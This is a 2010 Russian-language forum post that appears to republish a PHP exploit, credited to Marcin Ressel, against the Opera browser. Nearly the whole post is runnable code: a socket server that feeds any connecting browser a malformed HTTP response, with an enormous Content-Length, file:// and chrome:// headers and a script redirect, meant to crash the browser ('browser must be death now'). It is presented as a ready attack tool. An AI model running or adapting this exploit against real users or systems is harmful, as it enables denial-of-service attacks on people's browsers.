06.03.2010, 23:18
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
сплоит:
PHP код:
<?php
if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
else define('OS','nix');
if(!extension_loaded('php_sockets'))
{
if((OS == 'win') && (!@dl('php_sockets.dll')) ||
((OS == 'nix') && (!@dl('php_sockets.so'))))
die('fatal php_sockets.[dll/so] '.
'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");
}
/*Generated by my own fuzzer*/
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
'Transfer-Encoding: identity'."\r\n".
'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
'Server: moj zuy server'."\r\n".
'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
'Content-Location: file://C:/boot.ini'."\r\n".
'Vary:negotiate,accept-language,accept-charset'."\r\n".
'Tcn: choice'."\r\n".
'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
'Accept-Ranges: bytes'."\r\n".
'Cache-Control: max-age=0'."\r\n".
'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
'Content-Encoding: identity'."\r\n".
'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
'Keep-Alive: timeout=15, max=300'."\r\n".
'Connection: keep-alive'."\r\n".
'Content-Type: text/html; charset=iso-8859-2'."\r\n".
'Age: 1'."\r\n".
'Allow: GET,HEAD'."\r\n".
'Content-Disposition: inline'."\r\n".
'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
'Warning: 199 Miscellaneous warning'."\r\n".
'Trailer: Max-Forwards'."\r\n".
'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
'Content-Range: bytes 21010-47021/47022'."\r\n".
'Content-Language: pl'."\r\n\r\n".
'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
$buster = $argc - 1;
//use -port 666 if you need
for($i = 0; $i<=$buster; $i+=2)
{
if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
else $PORT = 81;
}
if(!($SOCKET = socket_create_listen($PORT)))
die('fatal socket init failed'."\r\n");
socket_set_option($SOCKET,SOL_SOCKET,
SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
echo('SOCKET READY AT PORT '.$PORT."\r\n".
'Now connect here via opera'."\r\n");
if($CONNECT = socket_accept($SOCKET))
{
$recv_buffer = null;
echo('Connection ok '."\r\n");
if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
{
if(!@socket_write($CONNECT,$EVIL))
{
socket_close($CONNECT);
socket_close($SOCKET);
die('I cant send payload !'."\r\n");
}
}
else echo('Something wrong with client side'."\r\n");
usleep(120000);
socket_close($CONNECT);
socket_close($SOCKET);
}
echo('OK ya browser must be death now'."\r\n".
'Have a nice day lol'."\r\n");
?>
автор: Marcin Ressel aka ~echo.
источник: securitylab.ru |
|
|